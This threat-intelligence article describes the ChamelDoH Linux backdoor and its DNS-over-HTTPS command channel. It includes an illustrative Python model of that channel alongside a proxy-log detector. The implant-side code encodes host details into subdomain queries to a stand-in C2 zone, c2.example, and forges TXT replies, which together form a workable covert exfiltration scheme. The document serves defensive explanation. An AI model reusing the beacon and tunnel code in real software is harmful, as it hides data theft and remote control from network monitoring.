ChamelDoH: New Linux Backdoor for Covert CnC Using DNS-over-HTTPS Tunnelling
Recent observations of the threat actor ChamelGang deploying a previously unknown Linux implant represent a substantial expansion of its capabilities. The newly discovered malware, named ChamelDoH by the cybersecurity company Stairwell, uses DNS-over-HTTPS (DoH) tunnelling to communicate with its operators and carry out malicious operations. Positive Technologies first documented ChamelGang in September 2021, describing its attacks on critical industries in several countries. This article covers the specifics of ChamelDoH, its distinctive communication mechanism, and the shifting tactics used by ChamelGang.
ChamelGang's Background and Attack Patterns:
Positive Technologies first documented ChamelGang's activity, which hit the aviation, energy and fuel industries in Russia, the U.S., India, Nepal, Taiwan and Japan. The threat actor used a passive backdoor known as DoorMe to gain unauthorised access to, and steal data from, Red Hat JBoss Enterprise Application Platform and Microsoft Exchange servers. DoorMe is a native IIS module that acts only on HTTP requests carrying particular cookie parameters, so it stays idle and inconspicuous for all other traffic.
The Discovery of ChamelDoH:
Stairwell recently identified the ChamelDoH Linux backdoor. Written in C++, the malware collects system information and provides remote access for a range of functions, including file upload, download and deletion and shell command execution. What sets ChamelDoH apart is its method of communication: it sends DNS TXT requests for a domain served by a malicious nameserver, and it sends them over DNS-over-HTTPS (DoH) rather than plain DNS.
Unique Communication Method and Benefits for Threat Actors:
Using DoH for command-and-control (C2) gives ChamelGang several advantages. Because the requests go to widely used public DoH resolvers such as Cloudflare's and Google's, the malicious traffic cannot easily be blocked at the enterprise level without also breaking legitimate DNS resolution through those services. The HTTPS encryption also makes adversary-in-the-middle (AitM) interception of the channel harder. The result is an encrypted path between the infected hosts and the C2 server, which makes it more difficult for security software to detect and block the malicious DoH requests, since their content is not visible without TLS termination.
Challenges for Security Solutions and Detection:
Daniel Mayer, a researcher at Stairwell, points out that ChamelDoH's traffic is hard to identify and block for the same reason domain fronting is: the requests are addressed to legitimate services hosted on content delivery networks (CDNs), while the Host header on those requests directs them to the C2 server. Blocking the destination therefore means blocking the legitimate service as well, which complicates identification and prevention for security systems.
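As an added illustration of the mechanism described in the two sections above (this is not code from the article, from Stairwell's report, or from the ChamelDoH sample itself), the following Python models both ends of a TXT-over-DoH channel and a detector that can run over proxy logs where TLS is terminated. The C2 zone c2.example, the host-id plus base32 subdomain layout, the resolver hostnames in the log and the log lines themselves are constructed assumptions; ChamelDoH's real encoding is not described on this page.

```python
"""Added example for this article, not code from the page, Stairwell or ChamelGang.
Models the shape of a DoH-tunnelled TXT channel (RFC 8484 GET form) on both sides
and a simple detector over decrypted proxy-log URLs. Assumptions: the C2 zone
"c2.example", the host-id + base32 subdomain layout, and the constructed log lines."""
import base64
import struct
from urllib.parse import parse_qs, urlparse

QTYPE_TXT = 16


def encode_name(name):
    """Encode a dotted name into DNS wire-format labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg, off):
    """Decode a wire-format name at `off` (no compression pointers are used here)."""
    labels = []
    while msg[off]:
        labels.append(msg[off + 1:off + 1 + msg[off]].decode("ascii"))
        off += 1 + msg[off]
    return ".".join(labels), off + 1


def build_txt_query(qname, txid=0x1234):
    """Standard recursive TXT query: 12-byte header plus one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", QTYPE_TXT, 1)


def doh_get_url(resolver, wire):
    """RFC 8484 GET form: unpadded base64url of the wire message in the `dns` parameter."""
    b64 = base64.urlsafe_b64encode(wire).rstrip(b"=").decode()
    return "https://%s/dns-query?dns=%s" % (resolver, b64)


def beacon_qname(host_id, payload, c2_domain):
    """Implant side (assumed layout): host id and base32 payload as subdomains of the
    attacker's zone, so the data reaches the attacker's authoritative nameserver."""
    data = base64.b32encode(payload).decode().rstrip("=").lower()
    labels = [data[i:i + 63] for i in range(0, len(data), 63)]  # 63-byte label limit
    return ".".join([host_id] + labels + [c2_domain])


def build_txt_response(query, txt):
    """Malicious nameserver side: echo the question and answer with one TXT string."""
    assert len(txt) <= 255, "a single TXT character-string is at most 255 bytes"
    txid = struct.unpack("!H", query[:2])[0]
    qname, off = decode_name(query, 12)
    question = query[12:off + 4]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA; 1 answer
    rdata = bytes([len(txt)]) + txt
    rr = encode_name(qname) + struct.pack("!HHIH", QTYPE_TXT, 1, 60, len(rdata)) + rdata
    return header + question + rr


def parse_txt_strings(msg):
    """Implant side: collect every TXT character-string from the answer section."""
    qd, an = struct.unpack("!HH", msg[4:8])
    off, txts = 12, []
    for _ in range(qd):
        off = decode_name(msg, off)[1] + 4
    for _ in range(an):
        _, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        rdata, off = msg[off + 10:off + 10 + rdlen], off + 10 + rdlen
        while rtype == QTYPE_TXT and rdata:
            txts.append(rdata[1:1 + rdata[0]])
            rdata = rdata[1 + rdata[0]:]
    return txts


def parse_doh_get(url):
    """Detector helper: recover (qname, qtype) from a DoH GET URL, else None. This is
    only possible where TLS is terminated (an inspecting proxy or the host itself)."""
    u = urlparse(url)
    dns = parse_qs(u.query).get("dns")
    if not u.path.endswith("/dns-query") or not dns:
        return None
    wire = base64.urlsafe_b64decode(dns[0] + "=" * (-len(dns[0]) % 4))
    qname, off = decode_name(wire, 12)
    return qname, struct.unpack("!H", wire[off:off + 2])[0]


def is_suspicious(qname, qtype, max_name=50, max_label=30):
    """Heuristic: TXT lookups with very long names or labels look like tunnelling."""
    longest = max(len(label) for label in qname.split("."))
    return qtype == QTYPE_TXT and (len(qname) > max_name or longest > max_label)


def flag_proxy_log(lines):
    """Return the qnames of suspicious DoH GET requests found in proxy-log URLs."""
    parsed = [parse_doh_get(line.split()[-1]) for line in lines]
    return [q[0] for q in parsed if q and is_suspicious(*q)]


# Constructed demo traffic: one beacon plus benign lookups (an SPF-style TXT query).
BEACON = beacon_qname("web01", b"host=web01;uid=0;os=linux;ver=5.15", "c2.example")
SAMPLE_PROXY_LOG = [
    "10.0.0.5 GET " + doh_get_url("dns.google", build_txt_query("example.com")),
    "10.0.0.5 GET " + doh_get_url("cloudflare-dns.com", build_txt_query(BEACON)),
    "10.0.0.6 GET https://www.example.org/index.html",
]
```

The detector only works where the `dns=` parameter is visible, which is the practical point of the section above: without TLS termination a network sensor sees nothing but an HTTPS connection to a well-known resolver, so the remaining controls are host telemetry and a policy that allows DoH only from the organisation's own resolver and alerts on clients that contact public DoH endpoints directly.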
Implications of ChamelDoH Discovery:
According to Stairwell's analysis, ChamelGang has invested considerable time and effort in building a reliable toolset for Linux intrusions. The discovery of ChamelDoH highlights the threat actor's growing sophistication and broadening capabilities. To counter these evolving threats, organisations must remain vigilant and adapt their defences accordingly.
The ChamelDoH Linux backdoor offers insight into ChamelGang's continuing efforts to improve its cyber capabilities. Its use of DNS-over-HTTPS (DoH) for command-and-control communications, which evades detection and eavesdropping, poses significant challenges for existing security measures. This development underlines the importance of keeping cybersecurity defences current and of proactively identifying and mitigating such risks.
As ChamelGang expands its attack vectors and targets critical enterprises, cybersecurity firms and law enforcement agencies must collaborate to develop effective defences. Sharing threat intelligence, conducting in-depth investigations and encouraging international cooperation are all necessary to dismantle the threat actor's infrastructure.
To defend against ChamelGang and similar attacks, organisations should prioritise comprehensive security practices: regular system updates, vulnerability patching, network monitoring (including visibility into which hosts use DoH at all, since direct client-to-resolver DoH is what this implant relies on) and employee training on recognising and mitigating potential risks. Businesses that adopt proactive security measures and stay a step ahead of attackers are better placed to protect their critical systems, data and reputation in a hostile digital world.